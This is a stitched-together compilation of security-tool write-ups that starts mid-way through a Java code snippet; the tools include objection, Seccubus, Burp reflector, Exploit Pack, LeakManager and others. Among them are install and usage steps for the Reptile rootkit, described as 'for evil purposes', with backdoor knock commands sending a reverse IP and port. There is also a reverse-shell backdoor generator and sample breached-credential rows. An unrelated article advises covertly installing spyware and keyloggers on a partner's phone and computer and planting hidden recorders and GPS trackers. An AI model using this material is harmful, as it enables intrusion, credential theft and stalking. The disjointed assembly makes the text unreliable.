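        System.out.println("Integer accepted:   " + acceptedByFilter(serialize(Integer.valueOf(5))));
        System.out.println("ArrayList accepted: " + acceptedByFilter(serialize(new java.util.ArrayList<String>())));

        UnicastRemoteObject.unexportObject(impl, true);
        UnicastRemoteObject.unexportObject(registry, true);
    }
}
```

On JDKs before 17 the same allow-list can be applied process-wide with `-Djdk.serialFilter=` or `ObjectInputFilter.Config.setSerialFilter`, at the cost of one filter for every stream in the JVM.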



objection - Runtime Mobile Exploration


objection is a runtime mobile exploration toolkit, powered by Frida. It was built with the aim of helping assess mobile applications and their security posture without the need for a jailbroken or rooted mobile device.
The project's name quite literally explains the approach as well, whereby runtime specific objects are injected into a running process and executed using Frida.
Note: This is not some form of jailbreak / root bypass. By using objection, you are still limited by all of the restrictions imposed by the applicable sandbox you are facing.

features
objection supports both iOS and Android, and new features and improvements are added regularly as the tool is used in real world scenarios. The following is a short list of only a few key features:
For all supported platforms, objection allows you to:
  • Patch iOS and Android applications, embedding a Frida gadget that can be used with objection or just Frida itself.
  • Interact with the filesystem, listing entries as well as upload & download files where permitted.
  • Perform various memory related tasks, such as listing loaded modules and their respective exports.
  • Attempt to bypass and simulate jailbroken or rooted environments.
  • Discover loaded classes and list their respective methods.
  • Perform common SSL pinning bypasses.
  • Dynamically dump arguments from methods called as you use the target application.
  • Interact with SQLite databases inline without the need to download the targeted database and use an external tool.
  • Execute custom Frida scripts.
iOS specific features in objection include the ability to:
  • Dump the iOS keychain, and export it to a file.
  • Dump data from common storage such as NSUserDefaults and the shared NSHTTPCookieStorage.
  • Dump various formats of information in human readable forms.
  • Bypass certain forms of TouchID restrictions.
  • Watch for method executions by targeting all methods in a class, or just a single method.
  • Monitor the iOS pasteboard.
  • Dump encoded .plist files in a human readable format without relying on external parsers.
Android specific features in objection include the ability to:
  • List the application's Activities, Services and Broadcast receivers.
  • Start arbitrary Activities available in the target application.
  • Watch a class method, reporting execution as it happens.

screenshots
The following screenshots show the main objection repl, connected to a test application on both an iPad running iOS 10.2.1, and Samsung Galaxy S5 running Android 6.

A file system listing of the iOS application's main bundle


A file system listing of the Android application's bundle


iOS Keychain dumped for the current application, and later written to a file called keychain.json


Inline SQLite query tool


SSL Pinning bypass running for an iOS application


SSL Pinning bypass running for an Android application


sample usage
A sample session, where objection version 0.1 is used to explore the application's environment. Newer versions have the REPL prompt set to the current application's name, but usage has remained the same:



prerequisites
To run objection, all you need is the python3 interpreter to be available. Installation via pip should take care of all of the dependencies needed. For more details, please see the prerequisites section on the project wiki.
As for the target mobile applications though, for iOS, an unencrypted IPA is needed and Android just the normal APK should be fine. If you have the source code of the iOS application you want to explore, then you can simply embed and load the FridaGadget.dylib from within the Xcode project.

installation
Installation is simply a matter of pip3 install objection. This will give you the objection command.
For more detailed update and installation instructions, please refer to the wiki page here.


Seccubus - Easy Automated Vulnerability Scanning, Reporting And Analysis


Seccubus automates regular vulnerability scans with various tools and aids security people in the fast analysis of their output, both on the first scan and on repeated scans.
On repeated scans, delta reporting ensures that findings only need to be judged when they first appear in the scan results or when their output changes.
Seccubus 2.x is the only actively developed and maintained branch and all support for Seccubus V1 has officially been dropped.

Seccubus V2 works with the following scanners:
  • Nessus
  • OpenVAS
  • Skipfish
  • Medusa (local and remote)
  • Nikto (local and remote)
  • NMap (local and remote)
  • OWASP-ZAP (local and remote)
  • SSLyze
  • Qualys SSL labs
  • testssl.sh (local and remote)
For more information visit [www.seccubus.com]

Seccubus Docker container

Usage

Running a full stack (db/app/frontend) in a single container and getting an interactive shell:
docker run -it seccubus/seccubus /bin/bash
By default the container holds a mysql server that runs and stores data locally. If you want data persistence there are two options:
Connect the container to a remote mysql/MariaDB database with environment variables (the -e options must come before the image name, and the variable is DBPORT):
docker run -ti -e DBHOST=dns.name.of.db.host \
-e DBPORT=3306 \
-e DBNAME=name.of.database \
-e DBUSER=db.username \
-e DBPASS=password \
seccubus/seccubus /bin/bash
Or, mount a data volume with a db directory on it:
mkdir data
mkdir data/db
docker run -it -v "$(pwd)/data:/opt/seccubus/data" seccubus/seccubus /bin/bash
Please be aware that you can only run one container at a time if you mount a local directory on /var/lib/mysql.

Running a scan
Run the following command to start the scan 'ssllabs' in workspace 'Example' (this workspace is created by default if you use the local mysql database)
docker run -ti seccubus/seccubus scan Example ssllabs
Please be aware that you need some data persistence here, or the data will be stored in a local database that is deleted when the container terminates.

Running a scheduler
You can run a docker container as a scheduler. This will make it run cron and allow your crontab to execute scans. You can populate the crontab either by placing a file called crontab in the /opt/seccubus/data volume or by putting the lines of your crontab in environment variables starting with CRON_
docker run -e "STACK=cron" -e "CRON_1=* 0 * * * bin/do-scan -w Example -s ssllabs" -ti seccubus/seccubus
This will spin up a container that executes scan ssllabs from workspace Example at midnight every night.
You can set the TZ variable to control the timezone.

Controlling TLS certificates
The Seccubus container is TLS enabled by default. The environment variable TLS controls this behaviour. If it is set to anything other than yes, TLS is turned off.
There are three ways to control the certificate:
  • Do nothing : Self signed certificates will be generated for you
  • Populate the variables TLSCERT and TLSKEY : The contents will be placed in /opt/seccubus/data/seccubus.pem and /opt/seccubus/data/seccubus.key and used
  • Put the certificates in the files seccubus.pem and seccubus.key on a data volume and mount it on /opt/seccubus/data

Show this help message
docker run -ti seccubus/seccubus help

Default command
If you don't specify a command to docker run
docker run seccubus/seccubus
The web server access log and error log will be tailed to the screen.

Other options
You can set the following environment variables:
  • STACK - Determines which part of the stack is run
    • full - Run everything
    • front - Start apache to serve the html/javascript frontend (this requires that the APIURL variable is set too)
    • api - Start apache to serve the json api at / (starts MariaDB too if required)
    • web - Start apache to serve both the html/javascript frontend and the json
    • perl - Do not start apache, just use this container as a perl backend
  • DBHOST, DBPORT, DBNAME, DBUSER, DBPASS - Database connection parameters
    • If DBHOST/DBPORT are set to 127.0.0.1/3306 the local MariaDB instance is started
  • APIURL - Path to the API url
    • Set this if your set STACK to front to redirect the API calls to an alternative relative or absolute URL.
  • BASEURI - Base URI for seccubus
    • Serve the application at the value provided
  • SMTPSERVER - IP address or host name of an SMTP server to be used for notifications
  • SMTPFROM - From address used in notifications
  • TICKETURL_HEAD/TICKETURL_TAIL - If these are set, ticket numbers will be linked to this URL
  • SSHKEY1, SSHKEY2, SSHKEY3 .. SSHKEY9
    • The content of this environment variable will be stored in the file /opt/seccubus/.ssh/SSHKEY1 etc.
    • You can use this mechanism to provide ssh keys that are used to start remote scans
  • HTTP_AUTH_HEADER - Set the http authentication header
    • If you are using something like OpenAM to authenticate your users, this allows you to set which http request header contains the user that OpenAM detected
  • TZ - Set the timezone of the container
  • TLS - Controls TLS behaviour yes means TLS is on, otherwise TLS is off. TLS is on by default.
  • JIT_GROUP - Controls JIT provisioning of users
  • CRON_MAIL_TO - Mail cron messages to this address
  • CRON_* - Add these lines to crontab in alphabetical order

MIDA-Multitool - Bash Script Purposed For System Enumeration, Vulnerability Identification And Privilege Escalation


Bash script purposed for system enumeration, vulnerability identification and privilege escalation.
MIDA Multitool draws functionality from several of my previous scripts, namely SysEnum and RootHelper, and is in many regards RootHelper's successor.
Besides functionality from these two previous scripts it incorporates some of its own, and as such aims to be a comprehensive assistant for operations and utilities related to system enumeration, vulnerability identification, exploitation and privilege escalation.

Usage
After a system has been successfully compromised, MIDA should be downloaded to the host in question either with git or wget. After it has been unpacked/cloned, the shell script needs to be made executable with chmod +x mida.sh
Upon doing so it can be run on the target host. The options available to the user are described below.
The 'Usage' option prints this informational message. The option 'System Enumeration' attempts to retrieve system information such as OS and kernel details, network status, processes, system logs and more. 'Common Utilities' checks for the existence of useful utilities such as telnet, netcat, tcpdump etc. 'External Utilities' opens a menu which lets you download external utilities that may prove to be helpful with further enumeration, vulnerability identification and privilege escalation.
Finally the option 'Cleartext Credentials' searches for text and web application files that contain certain keywords in order to find potential cleartext passwords.

Scripts available for download with MIDA


ShadowSocks ConnecTion - A Wrapper Tool For Shadowsocks To Consistently Bypass Firewalls

A wrapper tool for shadowsocks to consistently bypass firewalls.

Quick start

Automatically connect
The easiest way to run this tool is to just type ssct in a terminal; ssct will acquire available shadowsocks servers from ishadowsocks and connect to one automatically.

Connect to a specific server
First, show all ss servers by --list option.
ssct --list
Then, connect to a specific server by -n option.
ssct -n 5
Alternatively, you can connect to a custom server.
ssct -s <server_addr> -p <server_port> -l <local_port> -k <password> -m <method>

Usage

Requirements
1 Install shadowsocks
# for python2
pip install shadowsocks
# for python3
pip3 install shadowsocks
Note: You can also install shadowsocks with the system package manager (apt, yum, dnf, etc) or just the Chrome app version of shadowsocks. However, the Chrome app version can't connect automatically.
2 Install python3 modules
pip3 install requests
pip3 install prettytable
Note: The module prettytable is optional, but it is better to have it installed.

Configuration for google chrome
  1. Install chrome extension SwitchyOmega.


  2. Open the options of SwitchyOmega, and configure as below.
  3. List servers and select one to connect, or just type ssct to connect automatically.
  4. Select proxy option in chrome and enjoy it.

Configuration for firefox
  1. Install firefox extension AutoProxy.
  2. AutoProxy preferences: Proxy Server --> Edit proxy server, and add a shadowsocks item.
  3. Start ssct and select the shadowsocks proxy.
Note: For detailed help, see here.

More options
optional arguments:
-h, --help show this help message and exit

ssct options:
-n <num> connect server number
--ss <ss> path to shadowsocks, assumed in the PATH
--list list all ss servers
--stop stop running servers
--version show program's version number and exit
--morehelp show this help message and exit

shadowsocks options:
-c <config> path to config file
-s <addr> server address, auto crawl online
-p <port> server port, auto crawl online
-b <addr> local binding address [default: 127.0.0.1]
-l <port> local port [default: 1080]
-k <password> password, auto crawl online
-m <method> encryption method, auto crawl online
-t <timeout> timeout in seconds [default: 300]
--fast-open use TCP_FASTOPEN, requires Linux 3.7+
-d <daemon> daemon mode, one of start, stop and restart
--pid-file <file> pid file for daemon mode
--log-file <file> log file for daemon mode
--user <user> username to run as
-v, -vv verbose mode
-q, -qq quiet mode, only show warnings/errors
Connect to the available server automatically without any argument.


Cloud Security Suite - One stop tool for auditing the security posture of AWS infrastructure


One stop tool for auditing the security posture of AWS.

Pre-requisites
Python 2.7
pip
git

Installation
git clone https://github.com/SecurityFTW/cs-suite.git
cd cs-suite/
sudo python setup.py
Note - Generate a set of ReadOnly AWS keys, which the tool will ask for to finish the installation process.

Virtual Environment installation
(So you don't mess with the already installed python libraries)
pip install virtualenvwrapper
add it to the respective rc file of your shell (bashrc/zshrc) (for fish shell users check virtualfish)
echo "source /usr/local/bin/virtualenvwrapper.sh" >> ~/.bashrc
source the file
source ~/.bashrc
Run env:
cd cs-suite/
mkvirtualenv cssuite
workon cssuite
pip install -r requirements-virtual.txt
aws configure
Once installation is done, the tool will ask you for the AWS keys and region. These two are mandatory for the tool to work.

Run
python cs.py

Documentation
https://securityftw.github.io/Docs/

Videos

Installation and running CS Suite:

This is how you can audit a linux instance:

This is how you can audit a windows instance:


reflector - Burp plugin able to find reflected XSS on page in real-time while browsing on site

This Burp Suite extension finds reflected XSS on a page in real time while you browse a web site, and includes features such as:
  • Highlighting of the reflection in the response tab.
  • Testing which symbols are allowed in the reflection.
  • Analysis of the reflection context.
  • A Content-Type whitelist.

How to use
After installing the plugin you just need to start working with the web application under test. Every time a reflection is found, reflector defines the severity and generates a Burp issue.


Each Burp issue includes detailed info about the reflected parameter, such as:
  • Symbols that are allowed in this reflection.
  • Highlighting of the reflected value in the response.
  • Reflection context analysis.

Allowed symbols analysis


When a reflection is found and the "Aggressive mode" option is activated, reflector checks which special symbols from the vulnerable parameters are displayed on the page. To do this, reflector composes an additional request for each reflected parameter. In the example, while working with the elkokc.ml website, reflector generated an issue with detailed information about the reflection: there are 3 reflections of the "search" parameter and each of them passes special symbols. Because special characters can be displayed, the issue severity is marked as high. Every time a reflection is found, reflector defines the severity and generates a Burp issue.

Context analysis
In "Check context" mode, reflector not only shows which special characters are reflected into the page, but also figures out the character that allows breaking the syntax of the page code. In the example you can see the server response as shown by the reflector extension. The "search" parameter was sent with the payload p@y<"'p@y. As a result, it was reflected a few times in different contexts:
  • reflection with the characters ', " and <, where the double quote allows exiting this context and writing HTML code.
  • reflection with the characters " and <, where the angle bracket allows injecting HTML tags.
  • reflection with the characters ', " and <, where the single quote allows exiting the JS variable context and writing malicious code.

In the issue information this is marked as:
  • Context char - the character that allows breaking the syntax.
  • Other chars - other characters that are reflected but do not break the context.
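As an added example (my own code, not the reflector plugin's), the analysis described above: it finds every reflection of the p@y<"'p@y probe in a response body, checks which of < " ' came back unencoded, classifies the surrounding syntax with a small HTML/JS state machine, and reports the context-breaking character; the severity labels are this example's own simplification and the response body is constructed.

```python
"""Reflection and context analysis for a probe like p@y<"'p@y (added example, not reflector's code)."""
import re

MARKER = "p@y"      # probe marker from the page's payload p@y<"'p@y
SPECIALS = "<\"'"   # characters between the markers whose survival is tested


def find_reflections(body, marker=MARKER, window=32):
    """Return (start, end, between) for each marker...marker pair in body."""
    pattern = re.compile(re.escape(marker) + "(.{0,%d}?)" % window + re.escape(marker), re.S)
    return [(m.start(), m.end(), m.group(1)) for m in pattern.finditer(body)]


def _mask(body, spans):
    """Blank out reflected payloads so a raw one cannot derail parsing of later ones."""
    out, last = [], 0
    for start, end, _ in spans:
        out.append(body[last:start] + "x" * (end - start))
        last = end
    return "".join(out) + body[last:]


def classify_context(prefix):
    """Walk the markup before a reflection and return (context, context_char),
    where context_char is the character that would close that context."""
    in_script = in_tag = False
    js_quote = attr_quote = None
    tag_name = ""
    i, n = 0, len(prefix)
    while i < n:
        c = prefix[i]
        if in_script:
            if js_quote:
                if c == "\\":              # skip an escaped character in a JS string
                    i += 2
                    continue
                if c == js_quote:
                    js_quote = None
            elif c in "\"'`":
                js_quote = c
            elif prefix.startswith("</script", i):
                in_script, in_tag, tag_name = False, True, "/script"
                i += len("</script")
                continue
        elif in_tag:
            if attr_quote:
                if c == attr_quote:
                    attr_quote = None
            elif c in "\"'":
                attr_quote = c
            elif c == ">":
                in_tag = False
                in_script = tag_name == "script"
        elif c == "<":
            m = re.match(r"<\s*(/?)([A-Za-z][\w-]*)", prefix[i:])
            if m:                          # an opening or closing tag starts here
                in_tag, tag_name = True, (m.group(1) + m.group(2)).lower()
                i += m.end()
                continue
        i += 1
    if in_script:
        return ("js_string", js_quote) if js_quote else ("js_code", None)
    if in_tag:
        return ("html_attribute", attr_quote) if attr_quote else ("html_tag", None)
    return ("html_text", "<")


def analyze(body, marker=MARKER, specials=SPECIALS):
    """One finding per reflection: context, surviving specials, context char, severity."""
    spans = find_reflections(body, marker)
    masked = _mask(body, spans)
    findings = []
    for start, _, between in spans:
        survived = "".join(c for c in specials if c in between)
        context, ctx_char = classify_context(masked[:start])
        breaks = ctx_char is not None and ctx_char in survived
        findings.append({
            "offset": start, "context": context, "context_char": ctx_char,
            "breaks_context": breaks, "survived": survived,
            "other_chars": "".join(c for c in survived if c != ctx_char),
            # severity labels are this example's own simplification
            "severity": "high" if breaks else ("medium" if survived else "low"),
        })
    return findings


# Constructed response to a request with search=p@y<"'p@y (not from any real site)
SAMPLE_RESPONSE = """<html><body>
<input type="text" name="search" value="p@y<"'p@y">
<p>Results for p@y&lt;&quot;&#39;p@y</p>
<div>Tag: p@y<"'p@y</div>
<script>var q = 'p@y<"'p@y';</script>
</body></html>
"""
```

Running analyze(SAMPLE_RESPONSE) yields four findings: the attribute, text and script reflections come back with all three characters raw and their context char marked as breaking, while the HTML-entity-encoded one has no surviving specials.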

Reflection navigation
Navigation by arrow buttons in the response tab.


Settings
  • Scope only - allow reflector to work only with websites added to the scope.
  • Aggressive mode - reflector generates an additional request with a test payload.
  • Check context - activate check context mode.
Moreover, you can manage the content-type whitelist that the reflector plugin should work with. Using types other than text/html can slow the plugin down.


Exploit Pack - Penetration Testing Framework


Exploit Pack has been designed by an experienced team of software developers and exploit writers to automate processes so penetration testers can focus on what's really important: the threat. This blend of software engineers and subject matter experts provides a unique advantage by combining technical know-how with true insight into the problem set, resulting in more efficient solutions for cyber security surveillance.

Get an ISO/VM with Exploit Pack

Get an ISO or a VM with Exploit Pack already installed: Exploit Pack comes pre-installed in several Linux distributions, but our all time favorite is BlackArch, get it here: https://blackarch.org/downloads.html

Get/Update using GIT

After you install git on your platform (Windows, OSX or Linux), you can simply run the following commands. To get Exploit Pack:
$ git clone https://github.com/juansacco/exploitpack.git
To update to the latest release, navigate into the Exploit Pack folder and run this command:
$ git pull

Documentation

Please check our javadocs included under the folder with that name, also check our online guide, pdfs and the information all over the internet about this tool, feel free to make comments, integrate with our community and have fun!

Known issues:

Using Exploit Pack could produce addiction. Prolonged periods of time using this tool could produce network mayhem or even death. In case of intoxication (using Exploit Pack under Windows) please call your doctor immediately.

Installation notes:

Windows:

Download and install Java 8 from Oracle:
Depending on your platform you have to choose between Windows Java SE Java 8 for 32 bits or Java 8 for 64 bits. After you have installed Java 8 on your system, get Exploit Pack from the official site, uncompress it and double-click ExploitPack.jar; if that does not work, try from a console using this command: "java -jar ExploitPack.jar"

Linux:
Under any Linux distribution that supports DEB packages, like Ubuntu, Debian, Kali, etc., you can run the following commands to install Java 8 from an official repository. Copy and paste the following in a terminal window (writing to /etc/apt/sources.list needs root, hence sudo tee):
echo "deb http://ppa.launchpad.net/webupd8team/java/ubuntu trusty main" | sudo tee -a /etc/apt/sources.list
echo "deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu precise main" | sudo tee -a /etc/apt/sources.list
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys EEA14886
sudo apt-get update
sudo apt-get install oracle-java8-installer

Then, get Exploit Pack through GIT or download it from the official website. After that run it from a terminal using the following command: "java -jar ExploitPack.jar"

OSX:

Download and install Java 8 for OSX 32/64 bits from Oracle. After you have Java 8 installed on your Mac, download Exploit Pack, uncompress it and double-click ExploitPack.jar to run it, or from a console: "java -jar ExploitPack.jar"

BUILD OUTPUT DESCRIPTION

When you build a Java application project that has a main class, the IDE automatically copies all of the JAR files on the project's classpath to your project's dist/lib folder. The IDE also adds each of the JAR files to the Class-Path element in the application JAR file's manifest file (MANIFEST.MF).

To run the project from the command line, go to the dist folder and type the following:
java -jar "ExploitPack.jar" 
To distribute this project, zip up the dist folder (including the lib folder) and distribute the ZIP file.

Notes:

  • If two JAR files on the project classpath have the same name, only the first JAR file is copied to the lib folder.
  • Only JAR files are copied to the lib folder.
  • If the classpath contains other types of files or folders, these files (folders) are not copied.
  • If a library on the project's classpath also has a Class-Path element specified in the manifest, the content of the Class-Path element has to be on the project's runtime path.
  • To set a main class in a standard Java project, right-click the project node in the Projects window and choose Properties. Then click Run and enter the class name in the Main Class field. Alternatively, you can manually type the class name in the manifest Main-Class element.


OWASP ZAP 2.6.0 - Penetration Testing Tool for Testing Web Applications


The OWASP Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by hundreds of international volunteers*. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications. It's also a great tool for experienced pentesters to use for manual security testing.

For general information about ZAP:
  • Home page - the official ZAP page on the OWASP wiki (includes a donate button;)
  • Twitter - official ZAP announcements (low volume)
  • Blog - official ZAP blog
  • Monthly Newsletters - ZAP news, tutorials, 3rd party tools and featured contributors
  • Swag! - official ZAP swag that you can buy, as well as all of the original artwork released under the CC License
For help using ZAP:
Information about the official ZAP Jenkins plugin:
To learn more about ZAP development:

Justification
Justification for the statements made in the tagline at the top;)
Popularity:
  • ToolsWatch Annual Best Free/Open Source Security Tool Survey:
Contributors:


LeakManager - A Tool To Help You Manage Your Leaks


A Tool To Help You Manage Your Leaks

Install
sudo apt-get install mongodb-org screen
pip3 install -r requeriments.txt



Usage
screen -S leakManager
hug -f index.py -p 1337
OR
gunicorn index:__hug_wsgi__ -b 0.0.0.0:1337
OR
uwsgi --http 0.0.0.0:1337 --wsgi-file index.py --callable __hug_wsgi__
ctrl + a + d

Change user/passwd
edit etc/LeakManager.conf file

MassInsert
CSV Format
email,username,password,database

CSV Format example:
admin@admin.com,admin,admin1234,appXPTO
jose@admin.com,,zezin123,appXPTO
paula@admin.com,paula,123456,appXPTO
zika@admin.com,virus,nicole,appXPTO


How To Catch a Cheater


You have observed your partner and noticed some significant changes in behavior. They are more secretive about using their phone; they are working late or on the weekend; or they are not connecting with you like they used to. Do you have a cheater in the house? How can you find out? There are some old school methods and then there are some ways technology can help you with how to catch a cheater.

Tried and True from the Past

While some of these techniques may be a little too much cloak and dagger for you, they have worked many times in the past to catch cheaters. And they may suit your style of operation.

  1. Show up at a known location unexpectedly and assess the situation. Drop into the baseball practice to see if they are present. If they are not there, ask the team members about the absence. Listen carefully. Sometimes friends are willing to share their suspicions. Sometimes they try to cover up. If the suspected cheater is present, watch from a distance to see if anything is going on.
  2. Check the garbage and recycling in your home and at their work for incriminating evidence.
  3. Look through the phone bills, bank account statements, or charge card statements for charges that are suspicious. Are there restaurant charges that are unfamiliar?
  4. Check the odometer of the car to see if there is extra mileage that would signal extra trips to an unknown location.
  5. Set your spouse up by planning a trip (business or family) and then stay close to home to observe what is happening. Use a camera to log the evidence.
Technological Solutions: There are Apps for That!

You may want to use a technological solution for tracking behaviour for a variety of reasons. The evidence has already been recorded. All you have to do is locate it. It is easier to use technology, instead of a more physical solution. You will have evidence that you can use to confront the cheater. You are too embarrassed to go sneaking about. 
  1. Everyone's phone is full of personal information that is of a very telling nature. If you know the password, great. If you don't see if you can learn it by watching your partner unlock the phone. Or try some educated guesses. And then go through the phone looking for incriminating evidence. Review recent calls for repeated numbers, review the photos for people you don't know, look through messages and the app histories.
  2. If you can get into a computer your partner uses look for the same things you have done on the phone - any call history from programs like Skype and  also look at History on the web browser. Check out the photos there as well.
  3. On social media sites that are used by the cheater look for unusual items, such as a review of a restaurant you don't recognize and comments that don't make any sense to you, such as “Great Game with the Red Sox, Friday night.” when you thought working late was the excuse.
  4. If you do not know the passwords, take advantage of the opportunity to loan your phone to your partner in hope that they forget to log out. Then you can use that for access to complete searches.
  5. Installing tracking software on phones is another possibility, once you can get into the phone. Programs such as Contact Spy can track activity. Also you can track your spouse's cell phone by using the GPS function.
  6. If you can get access to the computer, you can install software that will pull up incriminating evidence, such as key loggers that track keystrokes.
  7. Make a fake idea for a dating website to see if you can find your partner there. If you are insistent, set up a date.
  8. Use an audio recording device, set to voice activation, in a location where the cheater usually talks on the phone, for those conversations that you are not allowed to hear. Many of these devices look like something else to make them appear innocuous. Put it in the home office, workshop, kitchen or bedroom.
  9. Put a hidden GPS on the car to track the journeys taken.

And if you need more details about how to do any of these technological solutions, go to the app store where, for less than $5, an app walks you through the process step by step. Now you have some strategies about how to catch a cheater.


Reptile - LKM Linux Rootkit


Reptile is an LKM rootkit for evil purposes. If you are looking for material only for study purposes, see the demonstration codes.

Features
  • Give root to unprivileged users
  • Hide files and directories
  • Hide files contents
  • Hide processes
  • Hide itself
  • Boot persistence
  • Heaven's door - An ICMP/UDP port-knocking backdoor
  • Client to knock on heaven's door :D

Install
apt-get install linux-headers-$(uname -r)
git clone https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
./installer.sh install

Usage
Binaries will be copied to the /reptile folder, which will be hidden by Reptile.

Getting root privileges
hax@Debian:~$ id
uid=1000(hax) gid=1000(hax) grupos=1000(hax),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth),118(scanner)
hax@Debian:~$ /reptile/r00t
You got super powers!

root@Debian:/home/hax# id
uid=0(root) gid=0(root) groups=0(root)

Hiding
  • Hide/unhide reptile module: kill -50 0
  • Hide/unhide process: kill -49 <PID>
  • Hide files contents: all content between the tags will be hidden
Example:
#<reptile> 
content to hide
#</reptile>

Knocking on heaven's door
Heaven's door is an ICMP/UDP port-knocking backdoor used by Reptile. To access the backdoor you can use the client:
Knock Knock on Heaven's Door
Writen by: F0rb1dd3n

Usage: ./knock_on_heaven <args>

-x protocol (ICMP/UDP)
-s Source IP address (You can spoof)
-t Target IP address
-p Source Port
-q Target Port
-d Data to knock on backdoor: "<key> <reverse IP> <reverse Port>"
-l Launch listener

[!] ICMP doesn't need ports

ICMP: ./knock_on_heaven -x icmp -s 192.168.0.2 -t 192.168.0.3 -d "F0rb1dd3n 192.168.0.4 4444" -l
UDP: ./knock_on_heaven -x udp -s 192.168.0.2 -t 192.168.0.3 -p 53 -q 53 -d "F0rb1dd3n 192.168.0.4 4444" -l

Disclaimer
Some functions of this module are based on other rootkits. Please see the references!

References

ZeroDoor - A Script Written Lazily For Generating Cross-Platform Backdoors


A script written lazily for generating reverse shell backdoors on the go, whenever you need them, without any hassle for your daily penetration testing needs. These backdoors are not James Bond high-tech stuff but rather simple ones with limited capabilities, to prevent over-exploitation. Once you generate the payload, somehow execute it on the concerned system, either a Windows or a nix based one. Once executed you will have the capability of executing remote commands on the compromised host.

Usage
python zerodoor.py
Tiny Overview
Nothing special it includes three basic backdoor generation capability for :-
  1. Nix/OSX Based
  2. Windows Shit
Powershell payload generation has been added due to its sophistication and persistence :)

Author
Souhardya Sardar is a lazy guy who keeps learning and gets trolled by experts Github :- github.com/Souhardya

